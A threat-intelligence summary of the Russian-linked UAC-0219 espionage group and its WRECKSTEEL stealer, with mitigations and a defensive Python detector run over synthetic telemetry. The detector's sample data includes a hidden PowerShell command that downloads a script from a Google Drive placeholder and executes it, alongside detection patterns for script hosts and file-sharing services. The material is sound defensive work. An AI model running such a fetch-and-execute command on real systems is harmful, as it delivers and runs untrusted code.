Full Report
Source: Industrial Cyber, "Russian-linked UAC-0219 group escalates attacks on Ukraine government, critical infrastructure". Excerpt: Ukraine's Computer Emergency Response Team (CERT-UA) has identified a significant increase in cyber espionage activities targeting the nation, ...
Analysis Summary
# Threat Actor: UAC-0219
## Attribution & Identity
CERT-UA tracks the activity as UAC-0219 and describes the group as Russian-linked.
## Activity Summary
UAC-0219 has been active since at least autumn 2024 and has recently stepped up its cyber espionage against Ukraine, with a marked increase in data-theft operations against government bodies and critical infrastructure operators. Initial access relies on phishing emails sent from previously compromised accounts and carrying malicious links.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails sent from compromised accounts, so the sender appears legitimate to the recipient and to mail filtering.
- **Delivery:** The emails carry links to public file-sharing services (DropMeFiles and Google Drive) that host the payload.
- **Execution:** A data stealer implemented in PowerShell; a VBScript variant has also been observed.
- **Collection:** Text documents, PDFs, images and presentations; the stealer can also capture screenshots of the infected host.
- **Exfiltration:** The PowerShell script sends the collected files out of the victim environment.
## Targeting
- Sectors: Government, Critical Infrastructure.
- Geography: Ukraine.
- Victims: Ukrainian governmental entities and critical infrastructure operators.
## Tools & Infrastructure
- **Malware Families Used:** WRECKSTEEL, a data stealer observed in PowerShell and VBScript variants.
- **Infrastructure (C2, domains, IPs):** DropMeFiles and Google Drive, used to host the initial payload. No C2 domains or IP addresses are listed in this summary.
## Implications
UAC-0219 demonstrates a sustained cyber espionage focus on the Ukrainian state apparatus and essential services. Sending phishing from compromised legitimate accounts defeats sender-reputation checks and external-sender warnings, and hosting the payload on widely used file-sharing services lets the download blend in with normal traffic; together these indicate a deliberate approach to bypassing initial security controls and delivering the group's data-stealing malware, WRECKSTEEL.
## Mitigations
- Treat mail from internal or partner accounts as untrusted when it links to external file-sharing services; monitor for internal senders distributing DropMeFiles or Google Drive links at unusual volume, and treat any such sending account as compromised until verified.
- Restrict PowerShell and VBScript execution launched from user-facing applications (mail client, browser, Office), for example with application control policies, and enable PowerShell script block and module logging so that script content is visible to defenders.
- Review policies on downloading scripts and executables from external file-sharing services such as DropMeFiles and Google Drive in sensitive environments, and log and review such downloads where they cannot be blocked outright.
- Detect mass file collection (a single process reading many documents, PDFs, images or presentations in a short window) and the outbound transfers that follow it.
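As an added worked example (not code from CERT-UA, Industrial Cyber or the report summarised above), the following Python flags the three observable stages of this chain over constructed Sysmon-style events: a script host spawned by a user-facing application, a script-host command line that fetches from a public file-sharing host, and one process reading many files of the types WRECKSTEEL collects within a short window. The host names, process lists, thresholds and sample events are assumptions for illustration; the report names only the services, not URLs or indicators.

```python
import re
from collections import defaultdict

# Assumed host names for the two services the report names; the page gives
# service names only, so these are illustrative, not indicators from the report.
FILE_SHARING_HOSTS = ("dropmefiles.com", "drive.google.com", "docs.google.com")

# Script hosts, and the user-facing parents that should almost never spawn them.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_FACING_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe"}

# File types the report says the stealer collects (documents, PDFs, images, presentations).
COLLECTED_EXT = re.compile(r"\.(txt|docx?|rtf|odt|pdf|jpe?g|png|pptx?)$", re.IGNORECASE)
MASS_READ_THRESHOLD = 20   # document reads by one process ...
WINDOW_SECONDS = 60        # ... within this many seconds (assumed tuning values)


def analyze(events):
    """Run the three rules over event dicts and return (rule, host, pid, detail) tuples.

    Event shapes (constructed for this example):
      {"type": "process", "ts", "host", "pid", "parent", "image", "cmdline"}
      {"type": "file_read", "ts", "host", "pid", "path"}
    """
    alerts = []
    recent_reads = defaultdict(list)  # (host, pid) -> timestamps of document reads in window
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "process":
            image, parent = ev["image"].lower(), ev["parent"].lower()
            if image not in SCRIPT_HOSTS:
                continue
            # Rule 1: script host launched from a mail client, browser or Office app
            if parent in USER_FACING_PARENTS:
                alerts.append(("script_host_from_user_app", ev["host"], ev["pid"],
                               f"{parent} -> {image}"))
            # Rule 2: the command line fetches from a public file-sharing service
            cmdline = ev.get("cmdline", "").lower()
            hit = next((h for h in FILE_SHARING_HOSTS if h in cmdline), None)
            if hit:
                alerts.append(("payload_from_file_sharing", ev["host"], ev["pid"], hit))
        elif ev["type"] == "file_read" and COLLECTED_EXT.search(ev["path"]):
            # Rule 3: mass collection - many document reads by one process in a sliding window
            key = (ev["host"], ev["pid"])
            window = [t for t in recent_reads[key] if ev["ts"] - t <= WINDOW_SECONDS]
            window.append(ev["ts"])
            recent_reads[key] = window
            if len(window) == MASS_READ_THRESHOLD:  # fire once, when the threshold is crossed
                alerts.append(("mass_document_collection", ev["host"], ev["pid"],
                               f"{len(window)} document reads within {WINDOW_SECONDS}s"))
    return alerts


def constructed_events():
    """Synthetic telemetry shaped like the chain described on this page; not real data."""
    events = [
        # Outlook launches PowerShell, which pulls a script from Google Drive (constructed).
        {"type": "process", "ts": 0, "host": "ws01", "pid": 4120, "parent": "OUTLOOK.EXE",
         "image": "powershell.exe",
         "cmdline": 'powershell.exe -w hidden -c "iwr https://drive.google.com/uc?id=XXXX '
                    '-OutFile $env:TEMP\\u.ps1; & $env:TEMP\\u.ps1"'},
        # Benign: an administrator runs PowerShell from Explorer and opens one note.
        {"type": "process", "ts": 3, "host": "ws01", "pid": 5000, "parent": "explorer.exe",
         "image": "powershell.exe", "cmdline": "powershell.exe -c Get-Service"},
        {"type": "file_read", "ts": 4, "host": "ws01", "pid": 5000,
         "path": "C:\\Users\\admin\\notes.txt"},
    ]
    # The stealer sweeps a user profile: 25 documents in 25 seconds.
    names = ["report", "budget", "memo", "slides", "scan"]
    exts = [".docx", ".pdf", ".txt", ".pptx", ".jpg"]
    for i in range(25):
        events.append({"type": "file_read", "ts": 10 + i, "host": "ws01", "pid": 4120,
                       "path": "C:\\Users\\olena\\Documents\\" + f"{names[i % 5]}_{i}{exts[i % 5]}"})
    return events


if __name__ == "__main__":
    for alert in analyze(constructed_events()):
        print(alert)
```

Run stand-alone, the script reports three alerts for pid 4120 and none for the administrator's PowerShell session. The third rule deliberately fires on the threshold crossing rather than on every read above it, so a noisy stealer produces one alert per window instead of hundreds; tune the threshold and window against normal file-server and backup activity before deploying it.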